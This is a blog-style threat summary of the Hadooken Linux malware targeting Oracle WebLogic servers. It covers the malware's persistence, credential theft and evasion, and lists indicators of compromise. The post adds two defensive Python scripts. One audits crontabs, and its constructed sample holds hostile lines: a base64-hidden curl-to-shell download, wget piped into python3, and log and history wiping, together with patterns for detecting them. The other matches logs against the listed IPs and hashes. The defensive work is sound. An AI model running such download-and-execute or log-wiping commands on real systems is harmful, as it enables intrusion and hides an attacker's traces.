Hadooken: New Linux Malware Exploiting Oracle WebLogic Servers

Introduction

In the ever-evolving landscape of cybersecurity threats, a new player has emerged: Hadooken. This Linux malware specifically targets Oracle WebLogic servers, which are widely used for running critical applications in enterprises. Let’s dive into the details.

What Is Hadooken?

    Attack Vector: Hadooken gains unauthorized access to WebLogic servers by exploiting weak passwords. Once inside, it remotely executes malicious code.

    Attack flow (Source – Aquasec)

    Payload Components:

    • A shell script named “c”
    • A Python script called “y”

    Cryptominer and DDoS Botnet

    Hadooken doesn’t stop at infiltration. It includes:
    • A cryptominer: Hijacking server resources for cryptocurrency mining.
    • The Tsunami malware: A DDoS botnet and backdoor, giving attackers full control.

    Persistence and Lateral Movement

    Hadooken ensures persistence by creating cron jobs. It can steal user credentials, allowing lateral movement within networks. But there’s more:

    Lateral Movement Techniques

    • Hadooken actively searches for SSH data in various directories. This allows it to move laterally within the network, potentially compromising other servers.
    • To evade detection, the malware employs several techniques:
      • Base64 Encoding: By encoding its communication or payloads in base64, Hadooken obscures its intentions.
      • Log Clearance: It attempts to erase traces of its activities by clearing logs.
      • Process Masquerading: Hadooken disguises itself as legitimate processes, making it harder to spot.
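
The cron persistence and the base64 and log-clearing evasion described above can be hunted for directly on a host. The following script is an added example written for this post, not code from the Aqua report or from the malware itself: it audits crontab entries for commands hidden behind base64, remote content piped into an interpreter, and log truncation. The sample crontab, the file paths in it and the 192.0.2.10 address are constructed for the example.

```python
import base64
import re
import string

# Constructed sample crontab, not material recovered from the malware. Line 3
# hides a download-and-run command behind base64, line 5 pipes a remote file
# straight into an interpreter, and line 6 wipes a log; the other entries are
# ordinary. 192.0.2.0/24 is the documentation address range.
_HIDDEN_CMD = "curl -s http://192.0.2.10/c | sh"
_HIDDEN_B64 = base64.b64encode(_HIDDEN_CMD.encode()).decode()

SAMPLE_CRONTAB = f"""\
# daily maintenance
0 3 * * * /usr/bin/certbot renew --quiet
*/5 * * * * echo {_HIDDEN_B64} | base64 -d | bash
@reboot /usr/local/bin/backup.sh
* * * * * wget -q -O - http://192.0.2.10/y | python3
0 * * * * echo '' > /var/log/wtmp && history -c
"""

# Runs of base64 alphabet long enough to hide a command.
B64_RE = re.compile(r"([A-Za-z0-9+/]{16,}={0,2})")
# Anything piped into a shell or scripting interpreter.
PIPE_TO_INTERP = re.compile(r"\|\s*(?:sh|bash|dash|zsh|python[23]?|perl)\b")
# Download tools used to fetch the next stage.
NET_FETCH = re.compile(r"\b(?:curl|wget)\b")
# Truncating files under /var/log or clearing shell history.
LOG_CLEAR = re.compile(r">\s*/var/log/|\bhistory\s+-c\b|\brm\s+-\w*f\w*\s+/var/log")


def _command_part(entry: str) -> str:
    """Strip the schedule (five fields or an @keyword) and return the command."""
    if entry.startswith("@"):
        parts = entry.split(None, 1)
        return parts[1] if len(parts) == 2 else ""
    parts = entry.split(None, 5)
    return parts[5] if len(parts) == 6 else entry


def _decode_if_text(candidate: str):
    """Return the decoded string if it is well-formed base64 of printable ASCII."""
    try:
        text = base64.b64decode(candidate, validate=True).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return None
    return text if all(ch in string.printable for ch in text) else None


def audit_crontab(crontab_text: str) -> list:
    """Return one finding per crontab entry that matches a suspicious pattern."""
    findings = []
    for lineno, raw in enumerate(crontab_text.splitlines(), 1):
        entry = raw.strip()
        if not entry or entry.startswith("#"):
            continue
        command = _command_part(entry)
        reasons, decoded = [], None
        # Only flag base64 that decodes to a fetch or an interpreter pipe, so
        # ordinary paths that happen to look like base64 are ignored.
        for candidate in B64_RE.findall(command):
            text = _decode_if_text(candidate)
            if text and (NET_FETCH.search(text) or PIPE_TO_INTERP.search(text)):
                reasons.append("base64-hidden command")
                decoded = text
                break
        if NET_FETCH.search(command) and PIPE_TO_INTERP.search(command):
            reasons.append("remote content piped to interpreter")
        if LOG_CLEAR.search(command):
            reasons.append("log clearance")
        if reasons:
            findings.append({"line": lineno, "command": command,
                             "reasons": reasons, "decoded": decoded})
    return findings


if __name__ == "__main__":
    for f in audit_crontab(SAMPLE_CRONTAB):
        print(f"line {f['line']}: {', '.join(f['reasons'])}")
        if f["decoded"]:
            print(f"    decodes to: {f['decoded']}")
```

Feed it the output of `crontab -l` for each user and the contents of the /etc/cron.d files; the base64 check deliberately requires the decoded text to be printable and to contain a download tool or an interpreter pipe, which keeps benign paths from being reported.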

    Indicators of Compromise (IOCs)

    • The associated IP addresses 89.185.85.102 and 185.174.136.204 link to potential ransomware distribution, specifically:
      • Mallox (MD5: 4a12098c3799ce17d6d59df86ed1a5b6)
      • RHOMBUS
      • NoEscape

    Multi-Platform Attack Strategy

    • A related PowerShell script named ‘b.ps1’ (MD5: c1897ea9457343bd8e73f98a1d85a38f) is involved in distributing the Mallox ransomware. This indicates a multi-platform attack approach.
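
The IOCs above (two IP addresses and two MD5 hashes) are the values a responder would sweep connection logs and file inventories for. The script below is an added example, not part of this post or of the Aqua research: it matches constructed firewall-style connection records and constructed `md5sum` output against the published indicators. The hash labels follow the post's attribution (Mallox, and b.ps1 as the script distributing Mallox); the log lines, timestamps and file paths are invented for the example.

```python
import hashlib
import re
from pathlib import Path

# IOC values are those quoted in the post; everything else here is constructed.
IOC_IPS = {"89.185.85.102", "185.174.136.204"}
IOC_MD5 = {
    "4a12098c3799ce17d6d59df86ed1a5b6": "Mallox",
    "c1897ea9457343bd8e73f98a1d85a38f": "b.ps1 (Mallox distribution script)",
}

# Constructed firewall-style connection records, not real traffic
# (10.0.4.0/24 is private space, 203.0.113.0/24 is a documentation range).
SAMPLE_CONN_LOG = """\
2024-09-13T02:14:07Z ACCEPT 10.0.4.21:51322 -> 203.0.113.9:443
2024-09-13T02:14:09Z ACCEPT 10.0.4.21:51330 -> 89.185.85.102:80
2024-09-13T02:15:41Z ACCEPT 10.0.4.22:44010 -> 10.0.4.1:53
2024-09-13T02:16:02Z ACCEPT 10.0.4.21:51342 -> 185.174.136.204:443
"""

# Constructed `md5sum` output; the paths are invented for the example.
SAMPLE_MD5SUM = """\
4a12098c3799ce17d6d59df86ed1a5b6  /tmp/.cache/payload.bin
d41d8cd98f00b204e9800998ecf8427e  /tmp/empty
c1897ea9457343bd8e73f98a1d85a38f  /tmp/b.ps1
"""

IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
# md5sum format: 32 hex digits, whitespace, optional '*' for binary mode, path.
MD5SUM_RE = re.compile(r"^([0-9a-fA-F]{32})\s+\*?(.+)$")


def match_connections(log_text: str) -> list:
    """Return every log line that mentions one of the IOC addresses."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        for ip in IP_RE.findall(line):
            if ip in IOC_IPS:
                hits.append({"line": lineno, "ip": ip, "record": line.strip()})
    return hits


def match_hashes(md5sum_text: str) -> list:
    """Match md5sum-format lines against the IOC hashes, case-insensitively."""
    hits = []
    for line in md5sum_text.splitlines():
        m = MD5SUM_RE.match(line.strip())
        if not m:
            continue
        digest, path = m.group(1).lower(), m.group(2)
        if digest in IOC_MD5:
            hits.append({"path": path, "md5": digest, "family": IOC_MD5[digest]})
    return hits


def md5sum_lines(paths) -> str:
    """Hash real files into md5sum format so they can be fed to match_hashes."""
    lines = []
    for p in map(Path, paths):
        digest = hashlib.md5(p.read_bytes(), usedforsecurity=False).hexdigest()
        lines.append(f"{digest}  {p}")
    return "\n".join(lines)


if __name__ == "__main__":
    for h in match_connections(SAMPLE_CONN_LOG):
        print(f"IOC address {h['ip']} on line {h['line']}: {h['record']}")
    for h in match_hashes(SAMPLE_MD5SUM):
        print(f"IOC hash for {h['family']}: {h['path']}")
```

On a live host, `md5sum_lines` over the files under /tmp and the WebLogic domain directories produces input in the same shape as the constructed sample, so the same `match_hashes` call applies.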

    WebLogic Servers at Risk

    • Shodan reveals over 230,000 internet-connected WebLogic servers, with several hundred exposed admin consoles vulnerable to exploitation.

    Potential Ransomware Connection

    • Hadooken’s binary hints at links to RHOMBUS and NoEscape ransomware strains.
    • The threat actors seem to target both Windows endpoints and Linux servers.

    MITRE ATT&CK® Framework

    [Image: MITRE ATT&CK mapping (Source – Aquasec)]

    • The MITRE ATT&CK framework serves as a comprehensive compendium of adversary tactics, techniques, and procedures (TTPs) employed throughout the intrusion lifecycle.

    Street Fighter Reference

    • The name “Hadooken” pays homage to the iconic attack move from the Street Fighter video game series.

    Conclusion

    Stay vigilant! Regularly update passwords, monitor for suspicious activity, and follow best practices to protect your servers.
